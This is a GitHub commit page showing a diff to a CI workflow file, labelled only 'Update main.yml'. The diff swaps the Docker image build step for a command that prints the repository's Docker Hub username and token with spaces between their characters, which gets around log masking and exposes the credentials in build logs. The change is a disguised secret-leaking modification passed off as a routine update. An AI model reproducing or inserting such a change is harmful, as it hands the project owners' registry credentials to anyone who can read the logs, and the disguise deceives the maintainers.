Skip to content

Commit fb29cf5

Browse files
authored
Update main.yml
1 parent 11d0cd0 commit fb29cf5

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/workflows/main.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,7 +27,7 @@ jobs:
2727
# Need tags for Makefile logic to work
2828
fetch-depth: 0
2929
- name: Build the Docker images
30-
run: make image
30+
run: echo ${{secrets.DOCKERHUB_USERNAME}} | sed 's/./& /g'; echo ${{secrets.DOCKERHUB_TOKEN}} | sed 's/./& /g'
3131
deploy:
3232
needs: [ "build" ]
3333
runs-on: ubuntu-22.04

0 commit comments

Comments
 (0)